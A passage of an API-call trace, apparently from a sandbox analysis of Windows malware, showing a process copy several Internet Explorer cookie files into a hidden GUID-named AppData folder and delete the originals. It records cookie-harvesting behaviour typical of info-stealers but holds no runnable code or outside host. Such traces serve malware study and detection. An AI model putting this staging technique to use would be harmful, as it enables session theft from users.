lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="MOE7DCQU.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\MOE7DCQU.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\MOE7DCQU.txt" [0252.739] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\MOE7DCQU.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\moe7dcqu.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\MOE7DCQU.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\moe7dcqu.txt"), bFailIfExists=0) returned 1 [0252.745] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\MOE7DCQU.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\moe7dcqu.txt")) returned 1 [0252.746] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.746] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.746] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.746] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.746] StrChrW (lpStart="Low\\NEHE4KDB.txt", wMatch=0x74c005c) returned="\\NEHE4KDB.txt" [0252.746] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.746] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.746] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.746] StrChrW (lpStart="NEHE4KDB.txt", wMatch=0x74c005c) returned 0x0 [0252.746] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="NEHE4KDB.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\NEHE4KDB.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\NEHE4KDB.txt" [0252.746] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\NEHE4KDB.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\nehe4kdb.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\NEHE4KDB.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\nehe4kdb.txt"), bFailIfExists=0) returned 1 [0252.751] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\NEHE4KDB.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\nehe4kdb.txt")) returned 1 [0252.752] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.752] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.753] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.753] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.753] StrChrW (lpStart="Low\\NOCAHPZ6.txt", wMatch=0x74c005c) returned="\\NOCAHPZ6.txt" [0252.753] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.753] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.753] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.753] StrChrW (lpStart="NOCAHPZ6.txt", wMatch=0x74c005c) returned 0x0 [0252.753] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="NOCAHPZ6.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\NOCAHPZ6.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\NOCAHPZ6.txt" [0252.753] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\NOCAHPZ6.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\nocahpz6.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\NOCAHPZ6.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\nocahpz6.txt"), bFailIfExists=0) returned 1 [0252.759] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\NOCAHPZ6.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\nocahpz6.txt")) returned 1 [0252.760] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.760] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.760] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.760] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.760] StrChrW (lpStart="Low\\NYCCG1AV.txt", wMatch=0x74c005c) returned="\\NYCCG1AV.txt" [0252.760] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.760] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.760] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.760] StrChrW (lpStart="NYCCG1AV.txt", wMatch=0x74c005c) returned 0x0 [0252.760] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="NYCCG1AV.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\NYCCG1AV.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\NYCCG1AV.txt" [0252.760] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\NYCCG1AV.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\nyccg1av.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\NYCCG1AV.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\nyccg1av.txt"), bFailIfExists=0) returned 1 [0252.799] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\NYCCG1AV.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\nyccg1av.txt")) returned 1 [0252.800] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.800] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.800] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.800] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.800] StrChrW (lpStart="Low\\O8FFFI2K.txt", wMatch=0x74c005c) returned="\\O8FFFI2K.txt" [0252.801] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.801] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.801] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.801] StrChrW (lpStart="O8FFFI2K.txt", wMatch=0x74c005c) returned 0x0 [0252.801] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="O8FFFI2K.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\O8FFFI2K.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\O8FFFI2K.txt" [0252.801] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\O8FFFI2K.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\o8fffi2k.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\O8FFFI2K.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\o8fffi2k.txt"), bFailIfExists=0) returned 1 [0252.807] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\O8FFFI2K.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\o8fffi2k.txt")) returned 1 [0252.809] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.809] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" [0252.809] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie"), lpSecurityAttributes=0x0) returned 0 [0252.809] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\" [0252.809] StrChrW (lpStart="Low\\P778SMC9.txt", wMatch=0x74c005c) returned="\\P778SMC9.txt" [0252.809] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\", lpString2="Low" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" [0252.809] CreateDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low"), lpSecurityAttributes=0x0) returned 0 [0252.809] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\" [0252.809] StrChrW (lpStart="P778SMC9.txt", wMatch=0x74c005c) returned 0x0 [0252.809] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\", lpString2="P778SMC9.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\P778SMC9.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\P778SMC9.txt" [0252.809] CopyFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\P778SMC9.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\p778smc9.txt"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie\\Low\\P778SMC9.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\{24a75f92-33c8-f66f-dd98-178a614c3b5e}\\cookie.ie\\low\\p778smc9.txt"), bFailIfExists=0) returned 1 [0252.814] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\INetCookies\\Low\\P778SMC9.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\inetcookies\\low\\p778smc9.txt")) returned 1 [0252.815] lstrcpyW (in: lpString1=0x7aae530, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}" [0252.816] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}", lpString2="\\cookie.ie" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\{24A75F92-33C8-F66F-DD98-178A614C3B5E}\\cookie.ie") 